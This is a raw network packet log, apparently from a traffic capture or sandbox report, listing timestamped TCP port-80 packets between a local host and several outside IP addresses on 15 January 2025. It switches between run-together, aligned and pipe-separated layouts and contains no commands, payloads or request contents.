                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.055583954 CET4918380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.060631037 CET804918382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.082676888 CET4918580192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.087785959 CET804918582.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.087852001 CET4918580192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.169465065 CET4918580192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.169549942 CET4918580192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.174902916 CET804918582.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:13.174940109 CET804918582.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:15.939172983 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:15.939265013 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.649981976 CET4918680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.655597925 CET804918654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.655755043 CET4918680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.659689903 CET4918680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.659710884 CET4918680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.665169954 CET804918654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.665184021 CET804918654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:17.368026972 CET804918654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:17.368314981 CET804918654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:17.368484020 CET4918680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:17.407887936 CET4918680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:17.413528919 CET804918654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.195931911 CET4918780192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.200825930 CET804918718.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.200885057 CET4918780192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.201039076 CET4918780192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.201057911 CET4918780192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.205872059 CET804918718.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.205902100 CET804918718.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.575298071 CET804918718.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.575360060 CET804918718.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.575417042 CET4918780192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.575542927 CET4918780192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.580348015 CET804918718.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.749604940 CET4918880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.754528046 CET804918854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.754596949 CET4918880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.754714012 CET4918880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.754714012 CET4918880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.759633064 CET804918854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.759663105 CET804918854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.475764990 CET804918854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.475805044 CET804918854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.475889921 CET4918880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.475986004 CET4918880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.480766058 CET804918854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.570063114 CET4918980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.574904919 CET804918944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.574985981 CET4918980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.578520060 CET4918980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.578520060 CET4918980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.583587885 CET804918944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.583619118 CET804918944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.737972975 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.738044977 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.738343954 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.743185997 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.042254925 CET804918944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.042485952 CET804918944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.042551041 CET4918980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.042651892 CET4918980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.047421932 CET804918944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.051423073 CET4919080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.056210041 CET804919072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.056260109 CET4919080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.059031963 CET4919080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.059042931 CET4919080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.063888073 CET804919072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.063900948 CET804919072.52.178.23192.168.2.22
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 15, 2025 12:58:21.595531940 CET  80           49190      72.52.178.23     192.168.2.22
Jan 15, 2025 12:58:21.811856985 CET  80           49190      72.52.178.23     192.168.2.22
Jan 15, 2025 12:58:21.812014103 CET  49190        80         192.168.2.22     72.52.178.23
Jan 15, 2025 12:58:21.812014103 CET  49190        80         192.168.2.22     72.52.178.23
Jan 15, 2025 12:58:22.000313997 CET  49191        80         192.168.2.22     199.59.243.228
Jan 15, 2025 12:58:22.005131006 CET  80           49191      199.59.243.228   192.168.2.22
Jan 15, 2025 12:58:22.005203009 CET  49191        80         192.168.2.22     199.59.243.228
Jan 15, 2025 12:58:22.005378962 CET  49191        80         192.168.2.22     199.59.243.228
Jan 15, 2025 12:58:22.010205984 CET  80           49191      199.59.243.228   192.168.2.22
Jan 15, 2025 12:58:22.468952894 CET  80           49191      199.59.243.228   192.168.2.22
Jan 15, 2025 12:58:22.469012022 CET  80           49191      199.59.243.228   192.168.2.22
Jan 15, 2025 12:58:22.469126940 CET  49191        80         192.168.2.22     199.59.243.228
Jan 15, 2025 12:58:22.469999075 CET  49190        80         192.168.2.22     72.52.178.23
Jan 15, 2025 12:58:22.470000029 CET  49190        80         192.168.2.22     72.52.178.23
Jan 15, 2025 12:58:22.474847078 CET  80           49190      72.52.178.23     192.168.2.22
Jan 15, 2025 12:58:22.474878073 CET  80           49190      72.52.178.23     192.168.2.22
Jan 15, 2025 12:58:22.613903046 CET  80           49190      72.52.178.23     192.168.2.22
Jan 15, 2025 12:58:22.660150051 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:22.665072918 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:22.665132999 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:22.665664911 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:22.670566082 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:22.825890064 CET  49190        80         192.168.2.22     72.52.178.23
Jan 15, 2025 12:58:22.827723980 CET  80           49190      72.52.178.23     192.168.2.22
Jan 15, 2025 12:58:22.827807903 CET  49190        80         192.168.2.22     72.52.178.23
Jan 15, 2025 12:58:23.203361988 CET  80           49184      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:23.203538895 CET  49184        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:23.203538895 CET  49184        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:23.208460093 CET  80           49184      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:23.301656008 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.301963091 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302025080 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.302038908 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302094936 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302126884 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302145958 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.302160025 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302191973 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302207947 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.302226067 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302258968 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302270889 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.302293062 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.302341938 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.307351112 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.307384014 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.307416916 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.307436943 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.392632961 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.392680883 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.392704010 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.392718077 CET  80           49192      13.248.148.254   192.168.2.22
Jan 15, 2025 12:58:23.392761946 CET  49192        80         192.168.2.22     13.248.148.254
Jan 15, 2025 12:58:23.485639095 CET  49193        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:23.491342068 CET  80           49193      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:23.491416931 CET  49193        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:23.491602898 CET  49193        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:23.491602898 CET  49193        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:23.497311115 CET  80           49193      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:23.497339964 CET  80           49193      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:32.469779968 CET  80           49191      199.59.243.228   192.168.2.22
Jan 15, 2025 12:58:32.469965935 CET  49191        80         192.168.2.22     199.59.243.228
Jan 15, 2025 12:58:34.466531038 CET  80           49185      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:34.466625929 CET  49185        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:34.567421913 CET  49185        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:34.572376013 CET  80           49185      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:34.593120098 CET  49194        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:34.598140001 CET  80           49194      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:34.598212004 CET  49194        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:34.600212097 CET  49194        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:34.600213051 CET  49194        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:34.605181932 CET  80           49194      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:34.605212927 CET  80           49194      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:44.859167099 CET  80           49193      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:44.859349012 CET  49193        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:44.859349012 CET  49193        80         192.168.2.22     82.112.184.197
Jan 15, 2025 12:58:44.864650965 CET  80           49193      82.112.184.197   192.168.2.22
Jan 15, 2025 12:58:45.266287088 CET  49195        80         192.168.2.22     47.129.31.212
Jan 15, 2025 12:58:45.271106958 CET  80           49195      47.129.31.212    192.168.2.22
Jan 15, 2025 12:58:45.271173000 CET  49195        80         192.168.2.22     47.129.31.212
Jan 15, 2025 12:58:45.271426916 CET  49195        80         192.168.2.22     47.129.31.212
Jan 15, 2025 12:58:45.271461010 CET  49195        80         192.168.2.22     47.129.31.212
Jan 15, 2025 12:58:45.276282072 CET  80           49195      47.129.31.212    192.168.2.22
Jan 15, 2025 12:58:45.276310921 CET  80           49195      47.129.31.212    192.168.2.22
Jan 15, 2025 12:58:46.651240110 CET  80           49195      47.129.31.212    192.168.2.22
Jan 15, 2025 12:58:46.651371002 CET  80           49195      47.129.31.212    192.168.2.22
Jan 15, 2025 12:58:46.651724100 CET  49195        80         192.168.2.22     47.129.31.212
Jan 15, 2025 12:58:46.651725054 CET  49195        80         192.168.2.22     47.129.31.212
Jan 15, 2025 12:58:46.657219887 CET  80           49195      47.129.31.212    192.168.2.22
Jan 15, 2025 12:58:46.822987080 CET  49196        80         192.168.2.22     13.251.16.150
Jan 15, 2025 12:58:46.827843904 CET  80           49196      13.251.16.150    192.168.2.22
Jan 15, 2025 12:58:46.827908993 CET  49196        80         192.168.2.22     13.251.16.150
Jan 15, 2025 12:58:46.829199076 CET  49196        80         192.168.2.22     13.251.16.150
Jan 15, 2025 12:58:46.829232931 CET  49196        80         192.168.2.22     13.251.16.150
Jan 15, 2025 12:58:46.834031105 CET  80           49196      13.251.16.150    192.168.2.22
Jan 15, 2025 12:58:46.834119081 CET  80           49196      13.251.16.150    192.168.2.22
Jan 15, 2025 12:58:48.202047110 CET  80           49196      13.251.16.150    192.168.2.22
Jan 15, 2025 12:58:48.202322960 CET  80           49196      13.251.16.150    192.168.2.22
Jan 15, 2025 12:58:48.202358961 CET  49196        80         192.168.2.22     13.251.16.150
Jan 15, 2025 12:58:48.203357935 CET  49196        80         192.168.2.22     13.251.16.150
Jan 15, 2025 12:58:48.207200050 CET  80           49196      13.251.16.150    192.168.2.22
Jan 15, 2025 12:58:48.309444904 CET  49197        80         192.168.2.22     44.221.84.105
Jan 15, 2025 12:58:48.314415932 CET  80           49197      44.221.84.105    192.168.2.22
Jan 15, 2025 12:58:48.314487934 CET  49197        80         192.168.2.22     44.221.84.105
Jan 15, 2025 12:58:48.314614058 CET  49197        80         192.168.2.22     44.221.84.105
Jan 15, 2025 12:58:48.314649105 CET  49197        80         192.168.2.22     44.221.84.105
Jan 15, 2025 12:58:48.319377899 CET  80           49197      44.221.84.105    192.168.2.22
Jan 15, 2025 12:58:48.319497108 CET  80           49197      44.221.84.105    192.168.2.22
Jan 15, 2025 12:58:48.773777008 CET  80           49197      44.221.84.105    192.168.2.22
Jan 15, 2025 12:58:48.773818970 CET  80           49197      44.221.84.105    192.168.2.22
Jan 15, 2025 12:58:48.773874998 CET  49197        80         192.168.2.22     44.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.773931026 CET4919780192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.778806925 CET804919744.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.812021971 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.817157984 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.817253113 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.829803944 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.830065966 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.834633112 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.834939957 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.191101074 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.191287041 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.191456079 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.204972029 CET4919880192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.210005045 CET804919818.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.236423969 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.241683006 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.241754055 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.241914988 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.241960049 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.246840000 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.246870041 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.788702011 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.946136951 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.951390982 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.951455116 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.951627016 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.956482887 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.973649025 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.978573084 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.999663115 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.999725103 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579607964 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579704046 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579735041 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579768896 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579787016 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579822063 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579839945 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579849958 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579881907 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579902887 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579915047 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579945087 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.579963923 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.580003977 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.580055952 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.584866047 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.584902048 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.584935904 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.584953070 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.584969044 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.585020065 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.585182905 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.592626095 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.666559935 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.666615009 CET804920076.223.26.96192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.666680098 CET4920080192.168.2.2276.223.26.96
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.694822073 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.694993019 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.700015068 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.700059891 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:51.909724951 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.119919062 CET804919972.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.120001078 CET4919980192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.604475021 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.609675884 CET8049202199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.609739065 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.609900951 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.614770889 CET8049202199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.064865112 CET8049202199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.064928055 CET8049202199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.064981937 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.208970070 CET4920480192.168.2.2234.246.200.160
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.213841915 CET804920434.246.200.160192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.213897943 CET4920480192.168.2.2234.246.200.160
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.229257107 CET4920480192.168.2.2234.246.200.160
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.229289055 CET4920480192.168.2.2234.246.200.160
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.234163046 CET804920434.246.200.160192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.234194040 CET804920434.246.200.160192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.952501059 CET804920434.246.200.160192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.952594042 CET804920434.246.200.160192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.952629089 CET4920480192.168.2.2234.246.200.160
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.952675104 CET4920480192.168.2.2234.246.200.160
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 12:58:53.957587957 CET | 80 | 49204 | 34.246.200.160 | 192.168.2.22
Jan 15, 2025 12:58:54.038131952 CET | 49206 | 80 | 192.168.2.22 | 34.227.7.138
Jan 15, 2025 12:58:54.043085098 CET | 80 | 49206 | 34.227.7.138 | 192.168.2.22
Jan 15, 2025 12:58:54.043148994 CET | 49206 | 80 | 192.168.2.22 | 34.227.7.138
Jan 15, 2025 12:58:54.046267986 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:58:54.046334982 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:58:54.072602034 CET | 49179 | 80 | 192.168.2.22 | 72.52.178.23
Jan 15, 2025 12:58:54.072668076 CET | 49206 | 80 | 192.168.2.22 | 34.227.7.138
Jan 15, 2025 12:58:54.072669029 CET | 49206 | 80 | 192.168.2.22 | 34.227.7.138
Jan 15, 2025 12:58:54.077513933 CET | 80 | 49179 | 72.52.178.23 | 192.168.2.22
Jan 15, 2025 12:58:54.077620029 CET | 80 | 49206 | 34.227.7.138 | 192.168.2.22
Jan 15, 2025 12:58:54.077646971 CET | 80 | 49206 | 34.227.7.138 | 192.168.2.22
Jan 15, 2025 12:58:54.499115944 CET | 80 | 49206 | 34.227.7.138 | 192.168.2.22
Jan 15, 2025 12:58:54.499155998 CET | 80 | 49206 | 34.227.7.138 | 192.168.2.22
Jan 15, 2025 12:58:54.499221087 CET | 49206 | 80 | 192.168.2.22 | 34.227.7.138
Jan 15, 2025 12:58:54.499308109 CET | 49206 | 80 | 192.168.2.22 | 34.227.7.138
Jan 15, 2025 12:58:54.504326105 CET | 80 | 49206 | 34.227.7.138 | 192.168.2.22
Jan 15, 2025 12:58:54.532708883 CET | 49207 | 80 | 192.168.2.22 | 208.117.43.225
Jan 15, 2025 12:58:54.538278103 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:54.538389921 CET | 49207 | 80 | 192.168.2.22 | 208.117.43.225
Jan 15, 2025 12:58:54.538629055 CET | 49207 | 80 | 192.168.2.22 | 208.117.43.225
Jan 15, 2025 12:58:54.538629055 CET | 49207 | 80 | 192.168.2.22 | 208.117.43.225
Jan 15, 2025 12:58:54.543459892 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:54.543489933 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:55.022780895 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:55.030762911 CET | 49207 | 80 | 192.168.2.22 | 208.117.43.225
Jan 15, 2025 12:58:55.030762911 CET | 49207 | 80 | 192.168.2.22 | 208.117.43.225
